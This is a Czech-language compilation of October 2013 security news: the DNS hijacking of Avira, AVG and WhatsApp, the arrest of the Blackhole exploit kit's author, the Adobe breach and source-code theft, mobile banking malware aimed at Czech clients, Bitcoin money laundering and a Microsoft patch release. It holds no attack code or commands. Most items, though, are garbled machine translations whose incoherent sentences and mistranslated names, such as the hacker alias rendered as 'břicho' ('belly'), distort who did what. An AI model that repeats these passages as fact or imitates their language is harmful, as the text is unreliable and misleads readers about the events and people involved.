Nasazení postupů podnikového zabezpečení správy, včetně investování do odpovídajících zdrojů, o jmenování vysoké úrovni leader v oblasti zabezpečení a využití certifikována či odborných pracovníků může snížit náklady a počítačové trestné činnosti umožňují organizacím ušetřit odhadem v průměru 1,5 milionu dolarů ročně.
"Informace je mocná zbraň v arzenálu organizace počítačová bezpečnost," řekl Dr. Larry Ponemon, předseda a zakladatel Ponemon Institute. "Na základě reálných zkušeností a in-hloubkové rozhovory s více než 1000 bezpečnostních profesionálů po celém světě, se náklady na výzkum počítačové trestné činnosti poskytuje cenný vhled do příčin a nákladů kybernetickým útokům. Výzkum je navržen tak, aby pomohl organizacím, aby co nejvíce nákladově efektivní rozhodnutí možné minimalizovat největší riziko pro jejich společnosti. "


Avira, AVG, WhatsApp stránky znetvořil palestinskými hacktivists
10.10.2013 Hacking | Bezpečnost

Webové stránky dodavatelů antivirového softwaru Avira a AVG, stejně jako populární IM služby WhatsApp, byly znetvořené palestinskými hackery s firmou Anonymous, které jdou podle jména "týmu KDMS".

Jak píšu to, Avira Hlavní stránka ještě sportovních skupiny pro-palestinské zprávu a AVG a WhatsApps "nemůže být dosaženo. hackerů "cílem se zdá být jen upozornit na situaci Palestinců, a jak má bylo potvrzeno, znetvoření Avira nebyla výsledkem, kontakt, hacking, ale že z firmy ISP Network Solutions. Šance jsou dobré, že ostatní defacements byly provedeny stejným způsobem. "Zdá se, že na náš účet se používá ke správě DNS registrován záznamy u Network Solutions získal falešný resetování hesla požadavek není iniciovaný kýmkoli, Avira, " sdílené Avira bezpečnostní expert Sorin Mustaca. "Síťová řešení se zdá, že ctí tuto žádost a dovolil třetí straně, aby převzala kontrolu nad svými DNS. Použití nové přihlašovací údaje zločinci byli schopni změnit položky poukázat na jejich DNS servery. " "Jakmile útočník získá kontrolu nad NS záznamů, mohou také změnit MX záznamy a přesměrovat e-maily, nebo v případě antivirus Avira společnosti, jako je změna adresy používané pro stažení aktualizace signatur, " poukázal ISC popisovač Johannes Ullrich. Dobrou zprávou je, že bylo poškozeno stránky se / nezahrnoval nebo poukazují na malware. Mustaca ale neřekl, zda se něco takového stalo, jen že mají vypnout všechny externí služby, dokud původní DNS záznamy jsou obnoveny. Tato skupina je zřejmě ten stejný, který provedl server DNS únos oficiálních stránkách LEASEWEB firmy hosting dříve během víkendu, a pokud útočník Twitter účet má být věřil, bylo Alexa a Redtube také zaměřeny na počátku tohoto týdne. UPDATE: "AVG mohou potvrdit dnes že má vybraný počet on-line vlastností počmáral jako výsledek našeho systému doménových jmen (DNS), registrátor být ohrožena, "komentoval firmu. "řada dalších společností se zdají být konfrontován s podobném problému. Situace je jsou dále sledovány a vyhodnocovány pozorně. Zákazníci jsou naší prioritou, máte DNS záznamy byly opraveny a AVG se usilovně snaží obnovit normální úrovně služeb svých zákazníků a nadále chránit své zákazníky a jejich soukromí. "


Hackeři cílové vysoký profil domén
9.10.2013 Hacking | Bezpečnost

V posledních dnech bylo několik vysokých profilových domén s poškozeným, včetně domén ze dvou předních bezpečnostních firem. Kromě toho bylo velmi známých oblastech, jako je alexa.com, whatsapp.com a redtube.com také poškozeno. Z naší rychlou analýzu Nezdá se, že skutečný webový server byl napaden, nejvíce možný cíl útoku bylo, že DNS byla unesena.

Při pohledu na toto, tam jsou některé docela zjevné stopy, ale nic, co by skutečně potvrzuje to, co hackeři udělali, nebo jaký druh informací, které byli schopni získat. Při analýze předchozí kompromisy a defaces se zdá, že je "nový" trend v hackerských skupin a defacers jít na DNS nebo registrátory domén namísto kompromisů aktuální webserver. Když rychle analýze domény byly tam dva ukazatele, které vystupovaly.

Domény, které byly napadené včera a dnes všichni měli velmi nedávné aktualizaci záznamů v jejich DNS, a všichni byli s použitím stejného registrátora DNS - Network Solutions, LLC.

Další zajímavá věc je, že všechny domény, které byly napadeny včera a dnes jen měl status: "clientTransferProhibited", zatímco doména alexa.com, který byl aktualizován 10.9.2013 také měl další "server" nastavení povolena. Je-li to souvisí s útoku je velmi obtížné říci.

Domain Name: REDTUBE.COM
Kanceláře: síťová řešení, LLC.
Stav: clientTransferProhibited
Aktualizováno Date: 07-Oct-2013

Domain Name: ALEXA.COM
Kanceláře: síťová řešení, LLC.
Stav: clientTransferProhibited
Stav: serverDeleteProhibited
Stav: serverTransferProhibited
Stav: serverUpdateProhibited
Aktualizováno Datum: 10-září-2013

Domain Name: WHATSAPP.COM
Kanceláře: síťová řešení, LLC.
Stav: clientTransferProhibited
Aktualizováno Date: 08-Oct-2013
Mezi cíle, které byly napadeny, jeden velký poskytovatel hostingu, LeaseWeb, psal o jejich kompromisu DNS na svém blogu:

http://blog.leaseweb.com/2013/10/06/statement-on-dns-hijack-of-leaseweb-com-website/
Je zajímavé, že po kompromisu, LeaseWeb přesunuta do nového registrátora - KeySystems Gmbh.

V tuto chvíli nevíme, jestli síťová řešení bylo ohroženo nebo pokud útočníci jednoduše sehnali přihlášení ovládacího panelu jinými metodami, jako bruteforcing. Navíc k přesměrování DNS / hi-hacking útoku byli jen pozor na šíření politické poselství, nebo jsou skutečně využití neznámou exploit?

UPDATE :2013-10-08 16:30 : Avira potvrzuje, že Network Solutions byl hacknutý. Více informací o tomto najdete v následujícím článku od

V době psaní, nevíme ještě, ale my opravdu doporučujeme aktualizovat na nejnovější dostupný výrobek a podpis databázi, protože tam by mohlo být více ohroženy domén tam.


Blackhole Exploit Kit Autor zatčen v Rusku
9.10.2013 Viry | Hacking | Bezpečnost | Kriminalita

Out-of-the-blue tweet z nizozemského výzkumníka odstartovala nebývalý 24hodinovou melou mlýny včera o zatčení břicho, hacker údajně za notoricky známý Kit Blackhole Exploit. Zatčení, nakonec dnes potvrdil vedoucí Evropského střediska počítačové kriminalitě (EC3), je pravděpodobné, aby díru do temného podsvětí počítačové trestné činnosti.

Blackhole je nejvíce známý malware kit k dispozici na darknet, souprava je v pronájmu zločinců, kteří používají mnoho zranitelná místa v prohlížeči k dispozici v sadě nakazit uživatele. Zločinci používají škodlivé odkazy vést uživatele k napadených míst a exploit kit pak určí, které využije bude pracovat na oběti počítači a použít je ohrožen stroj.

Troels Oerting, který provozuje EC3 z Haagu v Nizozemsku, potvrdil na TechWeek Evropy, Paunch byl ve vazbě.

"Vím, že je to pravda, máme nějaké informace, ale nemohu říci, už ne," Oerting je citován a dodal, že nemohl sdílet další podrobnosti.

bachor zatčení

Pověst mlýn odstartovala po pípání z Fox-IT bezpečnostní výzkumník Maarten Boone oznámil břicho zatčení v Rusku. Krátce poté, francouzský bezpečnostní výzkumník Kafeine řekl Threatpost prostřednictvím e-mailu, že souprava je Java archivy nebyly aktualizovány téměř čtyři dny, údaj se něco chystá. On poskytoval Threatpost s grafickým výše, který ukazuje celou řadu Blackhole míst vracejí brány chyby nebo jar soubory, které byly ignorovány dnů; Blackhole JAR soubory jsou aktualizovány někdy dvakrát denně.

Kafeine také řekl, že rozdělení malware Reveton Ransomware se přestěhovala z Blackhole Exploit WhiteHole do soupravy. [.] Navíc, krypta am, on-line služby údajně provozují břicho bylo včera nedostupný, služba se používá k zašifrování části exploit kit.

Aleks Gostev, hlavní bezpečnostní expert společnosti Kaspersky Lab Global Research & Analysis Team, potvrzuje i prostřednictvím anonymních zdrojů, že zatčení bylo vyrobeno.

"Tři scénáře [nyní] proveditelná: Blackhole mohou zmizet, být převzaty jinými vývojáři, nebo nahrazeny jinými exploit kity," řekl Gostev. "Co se kombinace těchto scénářů se stane, uvidíme."

V lednu Cool Exploit Kit vynořil on-line, a to i údajně postavena a udržována břichem. Chladná, ale je mnohem dražší, než jeho starší bratr, okouzlující blízko k $ 10,000 v měsíčních leasingových poplatků ve srovnání s 500 dolarů měsíčně za Blackhole.

V té době, Cool využila několika prohlížeči nulovou dny, které byly určeny k drženy v tajnosti, zatímco Blackhole, hostovaná služba, je balíček známých exploitů cílení záplaty chyby, obecně přesměruje prohlížeč, který vynutit oběti prohlížeč útok stránky, kde více malware čeká. Nedávno Blackhole odklonily od výhradně nabízí prohlížeč-založené chyby, a začala skládáním využije pro Java, Adobe Reader a Flash.

V roce 2011, zdrojový kód pro Blackhole unikly online, což jen posloužil, že dělá krajiny pro ohrožené organizací, které se mnohem chlupatější. Ale to nebolelo podnikání na břicho a jeho gangem, údajný tvůrce Blackhole, který znovu investovala více než 100.000 dolarů v prohlížeči a prohlížeč plug-in zranitelnosti, podle příspěvku na podzemní fóru hlášené Krebs pro bezpečnost v lednu tohoto roku.


Škodlivé Akrobacie: Adobe Nejnovější cíl v řetězci počítačových útoků
9.10.2013 Hacking | Bezpečnost

Vypadá to, že každý týden slyšíme o nové masivní firemních dat RAID a minulý týden nebyl výjimkou. Ve čtvrtek ráno, mnozí uživatelé Adobe probudil k e-mailu z obra počítačového softwaru o tom, že společnosti v oblasti bezpečnosti byla porušena, spolu s citlivými údaji milionů uživatelů. V e-mailu, Adobe potvrdila, že počítačoví zločinci se nelegálně získal přístup ke své síti, získat více než 2,9 milionu uživatelských jmen, šifrované kreditních a debetních karet, datum vypršení platnosti karty, přihlašovací ID a hesla. Adobe zdrojový kód pro několik produktů, včetně Acrobat a ColdFusion byl také přistupovat. A co víc, investigativní novinář Brian Krebs ukázal, že útok byl řízený stejnými zločinci za sebou botnet SSNDOB.ms, že jsem se vztahuje na mém blogu minulý týden .
Zatímco toto narušení údajů je stále vyšetřován, Adobe přijala několik chvályhodné kroky k jejich uživatelé obnovit. Kromě resetování hesla, společnost doporučuje všem jeho uživatelům udělat zatáčku všech účtů, které mohou sdílet podobné přihlašovací údaje, hesla a obnovit ty stejně. Adobe také nabízí úplný rok bezplatného členství úvěrového monitoringu pro spotřebitele, jejichž finanční informace byla ohrožena. Konečně, Adobe oznámila bankám, které zpracovávají Adobe související platby a spolupracuje s federální vymáhání práva v rámci šetření. Zatím není žádný důvod se domnívat, že získané zločinci dešifrovat čísla kreditních karet, ale společnost Adobe doporučuje, aby jeho uživatelé dávat pozor na budoucí výpisů z účtu a kreditních zpráv jen v případě.
Zatímco ohroženy jsou osobní údaje uživatelů Adobe je znepokojující, může to být jen zlomek této kybernetický útok v rovnici. V rozporu hackeři údajně sehnal nějakou zdrojový kód Adobe, které by potenciálně mohly otevřít bránu pro několik virů, malware a zneužití podle Držte zabezpečení. I když Adobe inženýři jsou stále v procesu kontroly nad integritě zdrojového kódu, je-li k zločinci byli schopni změnit tak kód by bezpečnostní důsledky, že je rozšířený since produkty Adobe jsou instalovány na většině našich zařízení a uloženy na mnoho vládních a firemní servery po celém světě. Jak nyní, Adobe oznámila žádné chyby terčem ve svých produktech, ale budeme i nadále sledovat vyšetřování, jak se rozvíjí.
Adobe není první velkou společností, která se zaměřuje zločinci, a to nebude poslední. To by mělo sloužit jako připomínka pro nás všechny, že i velké a důvěryhodné společnosti mohou být přijata podle zločinci, a musí být přijata opatření, aby zajistily, že nejste obětí.
Můžete si silná hesla a měnit pravidelně. Heslo by mělo být snadné pro vás pamatovat, ale pro ostatní obtížné uhodnout. Náležitosti pro bezpečné hesla jsou délka, čísla, symboly a horní a malá písmena. Jako další krok, nezapomeňte změnit tato každých pár měsíců a nikdy se znovu přes účty. McAfee SafeKey Password Manager (součástí McAfee LiveSafe ™ služby), který vám pomůže vytvořit silné heslo, umožňuje jedním kliknutím přihlášení na jakoukoliv stránku a zajistí, že vaše hesla jsou vždy zajistěte.
Pokud je to možné, používat dvoufázové ověření . Pokud webová stránka nebo služba umožňuje používat dvoufázové ověření, vyplatí se přidat další vrstvu zabezpečení k vašim informacím. Dvoustupňová ověření, v mnoha případech vyžaduje heslo i další úroveň zabezpečení, například při zadávání kódu, který byl Messaged textu do mobilního zařízení.
Instalace aktualizací na software, když jste uvolnění se. Když obdržíte oznámení od aplikace a software poskytovatele, že aktualizace byla k dispozici, je nutné jednat rychle. Pro majitelé PC, skener zranitelnosti součástí McAfee LiveSafe ™ vás upozorní, když programy jsou zastaralé, který vám pomůže zůstat na vrcholu pravidelných aktualizací vašich nainstalovaných programů, a chránit vás z nedávno objevených bezpečnostních mezer v softwaru.
Zabezpečte svá data, označení a všechny vaše zařízení. Užijte si bezpečné zážitky online bez ohledu na to, co děláte, nebo kde jste. S McAfee LiveSafe ™ můžete zablokovat hackery a zloději, chránit váš počítač, smartphone a tablety před viry a malware, a chránit vaši identitu a data.


Co lze vyčíst z nového útoku na Adobe

8.10.2013 Incident | Hacking | Zabezpečení
Adobe ve čtvrtek přiznalo, že se do jeho sítě nabourali kyberzločinci, kteří ukradli osobní informace včetně údajů z téměř tří milionů platebních karet.

Podle analytiků tento poslední útok ilustruje, jak lukrativním cílem poskytovatelé softwaru s platbami na měsíční bázi pro útočníky jsou.
„I před tím, než se objevily na cloudu, byly firmy účtující si od uživatelů měsíční poplatky za své služby pro útočníky zajímavým cílem,“ říká John Pescatore ze SANS Institute. „Poskytovatelé se tímto problémem zabývají již roky a existují dva důvody, proč tomu tak je. První: mají uloženo velké množství údajů z platebních karet. Za druhé: je jasné, že na těchto kartách jsou peníze.“ Adobe v poslední době velmi silně propaguje svou službu Creative Cloud, jež funguje na modelu měsíčního či ročního předplatného. To znamená, že společnost musí ukládat údaje z platebních karet, z nichž „odsává“ po uplynutí určitého období peníze, aniž by musela posílat tradiční účet. A útočníci o tyto karty mají zájem. „Tyto ukradené karty mohou mít na černém trhu hodnotu až třicet milionů dolarů,“ říká Rajesh Ramanand ze společnosti Signifyd.

Adobe není jedinou společností, která se snaží své zákazníky přimět, aby přešli na model předplatného. Podobnou cestou se vydal například i Microsoft se svými Office 365. Adobe mělo v uplynulém měsíci 1,03 milionu předplatitelů Creative Cloud, přičemž do konce roku by to již mělo být 1,25 milionu uživatelů. Microsoft pak v září oznámil, že jeho Office 365 Home Premium využívají dva miliony lidí, což je dvakrát tolik, co v květnu.

Průnik do jeho systémů bude Adobe stát značné množství peněz, neboť společnost bude postiženým zákazníkům poskytovat bezplatnou službu ročního monitoringu jejich účtu. „To je bude stát sto dolarů na uživatele,“ říká Pescatore s tím, že náklady se tak mohou vyšplhat až na 300 milionů dolarů. Někteří experti však nesouhlasí s tím, že útoky na Adobe byly provedeny přímo kvůli krádeži čísel karet. „Produkty Adobe již dlouho čelí silným útokům. Myslím si, že kyberzločinci jednoduše hledali jakákoli data a narazili na platební karty. Útočníci většinou nevědí, na co přesně narazí,“ říká Lawrence Pingree ze společnosti Gartner.

Podle Pingreeho šli zločinci spíše po uživatelských jménech a heslech, ne po číslech karet. „V dnešní době již také není vůbec jednoduché platební karty zneužít. Banky mají propracované kontrolní systémy, které umí tyto transakce rychle rozpoznat.“

Chet Wisniewski ze společnosti Sophos pak dodal, že Adobe udělalo zásadní chybu, když nešifrovalo všechna svá data. „Jak to, že jste nezašifrovali moje datum narození?“ ptá se Wisniewski. „Proč šifrovat pouze věci týkající se platebních karet? Mé datum narození je také součástí mé identity.“ Ať už byly útoky provedeny z jakéhokoli důvodu, jasné je, že uživatelé se při zadávání čísel svých karet na internetu nebudou cítit tak bezpečně jako dříve.


Adobe porušen, zákaznické informace a zdrojový kód ohrožena
6.10.2013 Incident | Hacking

Hackeři porušila Adobe síť a udělal pryč s osobním účtem, a šifrované finanční informace téměř 3 miliony zákazníků Adobe, stejně jako zdrojový kód pro Adobe Acrobat, ColdFusion, ColdFusion Builder a další produkty Adobe.

Brad Arkin, ředitel pro Adobe Security Officer říká, že dva útoky mohou souviset. Vyšetřování pokračuje, a jak daleko jak oni mohou říct, se hacker přístup těchto výrobkových zdrojové kódy nepřinesla na konkrétním zvýšeným rizikem k zákazníkům. "Jsme si není vědomo žádných zero-day exploitu zaměřených na všechny produkty Adobe. Nicméně, jako vždy Doporučujeme zákazníkům spouštět pouze podporované verze softwaru, použít všechny dostupné aktualizace zabezpečení, a řídit se pokyny v Acrobat Enterprise Toolkit a Lockdown ColdFusion Guide, "řekl poznamenal na svém blogu. nenasvědčuje tomu, že kód byl přístupný a odcizených přišel před týdnem, když novinář Brian Krebs spolu s Výzkumník Alex Holden odhalil na "masivní 40 GB zdrojový kód trove" na serveru, používaného útočníků, které jsou považovány stát za porušení několika velkých amerických brokerů dat objevil koncem minulého měsíce. Oni, samozřejmě, oznámení Adobe, a společnost potvrdila, že byly vyšetřuje porušení svých sítí od 17.září 2013. Co se týče vědí, byl zdrojový kód přístupný a exfiltrated kolem poloviny srpna, poté, co hackeři přístup k části své sítě, která se zabývá transakcemi zákazníků kreditní karty. Arkin poukázal na to, že se důsledně přezkoumány kód ColdFusion, že byl expedován od případu, a říká, že jsou přesvědčeni, že nebyla v žádném případě změnit. "Jsme stále na brainstorming fázi přijít se způsoby, jak poskytnout vyšší míru jistoty pro integritu našich produktů a že to bude klíčovou součástí naší reakce, "dodal. Mezitím, zákazníci, jejichž údaje - jména, šifrované kreditní nebo debetní karty čísla, termíny vypršení, a další informace týkající se objednávky zákazníků, zákaznických IDs a zašifrovaná hesla - byly ohroženy jsou stále informováni o tom a doporučil změnit svá hesla (a že na jiných on-line účtů, jestliže se použil stejný jeden), a dávat pozor na své bankovní účty a využít jednoroční bezplatné členství úvěrového monitoringu Adobe nabídl. "Máme oznámily banky zpracování klientské platby pro Adobe, aby mohli pracovat s firmami, platebních karet a karty vydávají banky, které pomáhají chránit účty zákazníků," že řekl , ale dodal, že nevěří útočníky odstraněny dešifrovat kreditní nebo debetní karty čísla z jejich systémů. Bližší informace o rozsahu a následcích útoků je určitě následovat, protože vyšetřování teprve na začátku. Klikněte zde pro komentáře k tomuto porušení, které pomáhají Net Security obdržel z různých bezpečnostních profesionálů.


Banky varovaly: Hackeři se k vašemu účtu zkoušejí dostat i přes mobil
5. 10. 2013 Hacking | Bezpečnost | Mobil
České banky zaznamenaly v posledních dnech větší množství pokusů o prolomení internetového bankovnictví svých klientů. Nově se hackeři pokoušejí ovládnout nejen počítače klientů, ale i jejich chytré telefony a následně převést peníze na útočníkův účet.
"Útočníci se teď nově pokoušejí nainstalovat do smartphonů aplikaci, která by jim umožnila získat i ověřovací SMS pro danou transakci," uvedl náměstek výkonného ředitele České bankovní asociace Jan Matoušek.

K tomu podle něj dochází tak, že je klient nevědomky přesměrován do podvrženého internetového bankovnictví, a zde je vyzván k instalaci škodlivého programu na svůj chytrý telefon.

Obrana je podle něj stejná, jaká se u tzv. phishingových útoků doporučovala už v minulosti. "Neotvírat žádné zprávy z neznámých zdrojů a neinstalovat nic, co neznám. Nově tedy ani do mobilního telefonu," dodal Matoušek.

Pozitivní je podle něj skutečnost, že banky zatím nevědí o nikom, kdo by kvůli těmto hackerským pokusům přišel o peníze. "Systémy bank napadeny nejsou, útok míří primárně na klienty, a proto považujeme za nezbytné klienty především varovat. Cílem útoku může totiž být kterýkoliv uživatel internetového bankovnictví," dodal Matoušek.

Vedle České republiky byly podobné hackerské útoky zaznamenány také v dalších evropských státech, především ve Velké Británii, Portugalsku nebo Turecku.


Adobe porušena, Acrobat a ColdFusion kód Ukradené Spolu s 2.9m záznamů o zákaznících
4.10.2013 Incidenty | Hacking | Bezpečnost

Útočníci přístup zákazníků ID, šifrovaných hesel, stejně jako zdrojový kód pro řadu produktů Adobe, Adobe šéf bezpečnosti Brad Arkin oznámil .

Arkin uvedl Adobe spolupracuje s policií na závažnosti porušení, v němž útočníci přístupný zdrojový kód pro Adobe Acrobat, ColdFusion, ColdFusion Builder a případně jiné produkty Adobe.

"Na základě našich poznatků, k dnešnímu dni, nejsme vědomi žádné konkrétní zvýšené riziko pro zákazníky v důsledku tohoto incidentu," Arkin uvedl v prohlášení.

Arkin tzv. útoky na síti Adobe "sofistikovaný", a že informace o 2,9 milionu zákazníků byl odstraněn od společnosti strojů, včetně jména zákazníků, šifrované kreditních a debetních karet, vypršení data a další informace používané v zákaznických objednávek.

"V tuto chvíli se nedomníváme, odstraněné útočníci dešifrovat kreditní nebo debetní karty čísla z našich systémů," říká Arkin. "Hluboce litujeme, že tento incident."

Arkin uvedl Adobe není vědoma žádných zero-day využije použité v útoku, ale doporučuje zákazníkům provozovat pouze podporované verze produktů Adobe a zajistit patch levels jsou aktuální. Řekl, že uživatelé by rovněž měli sledovat pokyny jsou dostupné v Acrobat Enterprise Toolkit a ColdFusion Lockdown Guide.

"Tyto kroky mají pomoci zmírnit útoky na starší, neopravených nebo nesprávně nastavený nasazení produktů společnosti Adobe," řekl Arkin.

Adobe řekl, že je resetování hesla zákazníky , aby se zabránilo další přístup k zákaznických účtů. Retinované zákazníci budou informováni prostřednictvím e-mailu s informacemi o tom, jak změnit svá hesla, Arkin řekl.

Dodal, že Adobe se také pracuje na oznámení zákazníků, jejichž platební karta informace byly přístupné. Oznámení dopisy jdou ven s doplňujícími informacemi týkající se ochrany osobních údajů. Adobe uvedla, že nabízí zákazníkům za jeden rok zdarma úvěrového monitoringu.

Arkin připočítán bezpečnostní zpravodaj Brian Krebs a ​​Alex Holden Hold, bezpečnostní LLC, který je upozorňuje na potenciální problém a pomoci s odpovědí. Krebs dnes oznámila, že se dozvěděla o úniku zdrojového kódu před týdnem, když zjistil, 40GB dat Adobe na stejném serveru, používaného zločinci zapojenými do LexisNexis, Dun & Bradstreet a Kroll porušení letos.

"Hacking týmu serveru obsahovala obrovské repozitáře nezkompilovaný a zkompilovaný kód, který se objevil jako zdrojový kód pro aplikaci ColdFusion a Adobe Acrobat," Krebs napsal dnes.

Krebs řekl, Adobe se domnívá, útočníci popraskané zdrojového kódu úložiště v polovině srpna po přístupu k části sítě, Adobe, která zpracovává transakce kreditní kartou.

Krebs má také screenshot kódu Acrobat z úložiště, včetně kódu od dosud nevydaných vlastností produktu.

"Jsme stále ve fázi brainstorming přijít se způsoby, jak poskytnout vyšší míru jistoty pro integritu našich produktů, a že to bude klíčovou součástí naší reakce," řekl Krebs Arkin. "Těšíme se na malware analýzy a zkoumání různých digitálních aktiv, které máme. Právě teď vyšetřování je opravdu na stopu strouhanky o tom, kde se protivníci dotkl. "


Bitcoiny, Web-Výměny Udělat Následovat peníze téměř nemožné

4.10.2013 Hacking | IT
WASHINGTON, DC - Dobrou zprávou je, že spolupráce mezi různými orgány činnými v trestním řízení v různých zemích po celém světě je na všech dob vysoká, špatná zpráva je, že zločinci přijali silnou kombinaci anonymní on-line měny Bitcoin a stejně anonymní , Web-based měn nacházejí mimo jurisdikci USA, které jim umožní zase ty Bitcoiny skutečné peníze, takže je mnohem obtížnější, než kdy jindy sledovat špatní herci dolů.

Taková je realita světa, ve kterém žijeme kdysi pokusil-a-pravdivý donucovací metodu po peníze, aby si na dno organizovaných zločineckých operací je obtížnější vznikem digitální měny, mezinárodní drátu převody a Web-based směnáren chráněna před americkým právem jejich umístění a skryté z dohledu s vrstvami upon vrstev mlžení, Kaspersky Lab princip zabezpečení vědec Kurt Baumgartner vysvětlil v rozhovoru s Threatpost středu.

Baumgartner zúčastnili panelové diskuse zabývající se globální obchodování s finančními údaji na Visa globální bezpečnosti summitu tento týden. Panel ohlašovaný spolupráce mezi různými vnitrostátními orgány činnými v trestním řízení, jakož i výměna informací mezi soukromými podniky a vymáhání práva zde ve Spojených státech panelu také zdůraznila významný posun ve způsobech, jakými útočníci podnikáme.

Kdysi to byl případ, Baumgartner vysvětlil během panelové diskuse, které útočníci téměř výhradně zaměřena platebních procesorů a firem poskytujících finanční služby, aby se ukrást firemní finanční údaje přímo od zdroje. Nicméně, mnoho z těchto firem začaly stanovení priorit zabezpečení sítě, posilující jejich obranu, a dělat to mnohem těžší pro útočníky ohrozit jejich systémů. Takže útočníci se pohybovali na sekundárních cílů, jako zprostředkovatelé údajů, kde by mohli ukrást troves citlivých informací z poněkud méně bezpečný oddělí. Mohli by pak tyto informace použít k zahájení phishingu a dalších útoků sociálního inženýrství s cílem vytvořit postranních kanálů do více vnitřně cenných sítí, případně krádeže stejné firemní finanční údaje, které usilovaly na prvním místě.

Tato informace je velmi kupují a prodávají on-line s digitálními měnách, jako Bitcoin, nebo platil za s mezinárodními bezhotovostních převodů usnadněn zdánlivě - v mnoha případech - jinak legitimní služby spojené s převodem peněz, jako je Western Union a WebMoney. V případě Bitcoin, to může být měna se obrátil do fyzického peněz na libovolný počet webových směnáren - "Za poplatek vždy za poplatek, ale když se díváte na praní špinavých peněz, tito lidé jsou ochotni zaplatit "řekl Baumgartner.

"Jsou to poskytováním služeb a platit za skládky - tak ukradl vaše osobní identifikační údaje - zaplatí za to Bitcoin a v podstatě prodejce bere své výnosy a dá to do cenných papírů, a pak je schopen odstoupení vlastně peníze," řekl Baumgarnter.

Baumgartner by později vysvětlit, že zmatek, kromě těchto zámořských směnárenských služeb, je dělat to jednodušší a jednodušší pro zločince přesouvat své peníze kolem a nakonec vyprat.

"Se všemi těmito incidenty, jeden z klíčů k účinnému vyřešení těchto špatných herců po peníze," řekl. "A když se dostanete Bitcoin zapojen, se stává téměř nemožné sledovat peníze. Bohužel, to je místo, kde mnoho z těchto kluků se pohybují. "

Baumgartner nakonec se vrátil k tomu, co z ostatních členů panelu, FBI Donald Dobrá, řekl ve svém jednání na summitu dříve. Dobrou zprávou pro všechny je, že spolupráce a koordinace mezi donucovacími orgány je v pořádku. Baumgartner to ví, protože on hrál roli v účasti společnosti Kaspersky Lab v oblasti vymáhání práva v USA av zahraničí sundávat botnety a další cybercriminal operace.

Baumgartner loupil mimo seznam cybercriminal zatčení - tvrdil, že téměř všichni z nich došlo v důsledku mezinárodní spolupráce: takedown o směnném Liberty Reserve, údajně útočištěm pro praní špinavých peněz, počet osob, údajně spojené s reputací cybercriminal Alberto Gonzalez byl zatčen a obviněn z různých zločinů v Amsterdamu přes léto, a právě tento týden, bulharský věřil k byli vůdce obrovský ziskový ATM skimming operace byl zatčen v této zemi, která Baumgartner poznamenal, je neobvyklé.

Ve skutečnosti, jen o den dříve, FBI sundala neslavný Silk Road podzemní trh . Silk Road byl nezákonný trh pro léky, hacking služby, malware a souvisejících nástrojů, zbraní a střeliva, pirát webové účty a absolutní zabil osobní, citlivé a finančních informací, které všechny musely být koupil a zaplatil za použití Bitcoin . Inzerce údajně generuje nějaký 1200000000 dolarů a je téměř dokonalý mikrokosmos, jak světový obchod v nelegálního zboží a informace o provozu. Je zajímavé, že Silk Road nasazen použití silného šifrování a anonymity nástrojů chránit sebe od vymáhání práva. Nakonec Ross William Ulbricht, muž, který běžel Silk Road, dělal co FBI popsal jako "jednoduchý omylem" vedoucí k jeho zatčení. Jinými slovy, vyšetřovatelé měli štěstí, půjčovat spolehlivost tvrzení Baumgartner je, že zločinci jsou těžší než kdy jindy chytit uvedených anonymních digitálních měn, anonymní prohlížení webových transferů a anonymní tržiště.

Baumgartner také navrhl na závěr možnost, že nový trend, firemní krádeže identity může být vznikající. Dunn & Bradstreet, New Jersey, založené na firemní udělení licence firma odhaleno v "SSNDOB [dot] MS 'Brian Krebs" projev, je jakýmsi firemních dat makléře. Takže co se stane, Baumgartner řekl, když útočník ukradne identitu společnosti? On nebo ona krade mnohem víc peněz, může jít nepovšimnutý na mnohem delší dobu.


Adobe Porušení FAQ

4.10.2013 Incident | Hacking

Pravděpodobně jste viděli nyní příběhy o stáhnutí nejnovější verze Adobe byl porušen, údaje o zákaznících jsou vystaveny a zdrojový kód unikly. Skvělá práce Brian Krebs v odhalování těchto porušení, a má velký writeup o tom zde: http://krebsonsecurity.com/2013/10/adobe-to-announce-source-code-customer-data-breach/

Ale co to znamená pro vás? Má to vliv na vás jako zákazníka Adobe? Zde je několik otázek, které udržují blíží.

1 - Jak se dostali dovnitř?

Zdá se, zranitelnost ColdFusion byla použity k porušování webu v Adobe používá pro zpracování plateb. Skupina, která porušila Adobe ColdFusion používá appearantly využije jako jeden z jejich oblíbených nástrojů k porušení stránek. Opět viz Brianův vynikající práci nad pro více informací.

2 - jsem uživatelem ColdFusion. Mám strach?

Ano

3 - Jak mohu chránit sám sebe jako uživatel ColdFusion?

Ujistěte se, že oprava. ColdFusion nějaké významné chyby, které byly patch před několika měsíci (zejména vydány patche kolem května). Pokud jste záplatovaný tyto problémy ještě, pak byste měli asi zavolat tento "incident". Ale pak znovu, Incident Response je tak mnohem zajímavější a pak operace.

4 - Musím změnit své heslo?

Č. Adobe již změnilo své heslo stránkách společnosti Adobe. Pokud stále používáte stejné heslo na více místech: Děláte to worng. Změna hesla vám pomůže co nejméně měnit spodní prádlo, pokud nechcete čistit mezi použití.

5 - To Ineed se starat o své kreditní karty, pokud jsem to s Adobe?

Vždy byste se měli starat o své kreditní kartě. Ale pro nejvíce se rozdělit, je to vaše banka je problém. Uvolněte se, sledovat vaše příkazy, získat novou kartu, pokud vidíte podivné poplatky nebo když vaše banka vás na to upozorní. Můžete použít debetní kartu on-line? Brave! Pravděpodobně jste také nelíbí, bezpečnostní pásy a jíst supermarket Puffer ryby sushi.


Microsoft připravuje osm záplaty, IE Zero Day Fix v říjnu Patch Tuesday

4.10.2013 Zranitelnost | Hacking
Společnost Microsoft oznámila, že plánuje vydat osm záplaty příští týden v rámci svého října Patch Tuesday propuštění řešit nedostatky ve svých operačních systémech Windows,. NET Framework Office, Server, Silverlight a co je nejdůležitější jeho prohlížeče Internet Explorer.

Čtyři z patche jsou označeny kritické, včetně té první, která by měla řešit nepříjemný zero day chybu, která byla postihující všechny verze aplikace Internet Explorer za poslední měsíc nebo tak nějak. Microsoft původně vydala fixit nástroj pro zranitelnosti před třemi týdny poté, co zprávy o zneužití bylo vidět ve volné přírodě, ale toto je první patch pro vydání bude společnost dodávat uživatelům.

Chyba pramení z toho, jak IE "přistupuje objekt v paměti, který byl odstraněn nebo nebyl řádně přiděleny. Tato chyba zabezpečení může dojít k poškození paměti takovým způsobem, který by mohl útočníkovi umožnit spuštění libovolného kódu v kontextu aktuálního uživatele v aplikaci Internet Explorer ", podle poradní Microsoft vydala v polovině září .

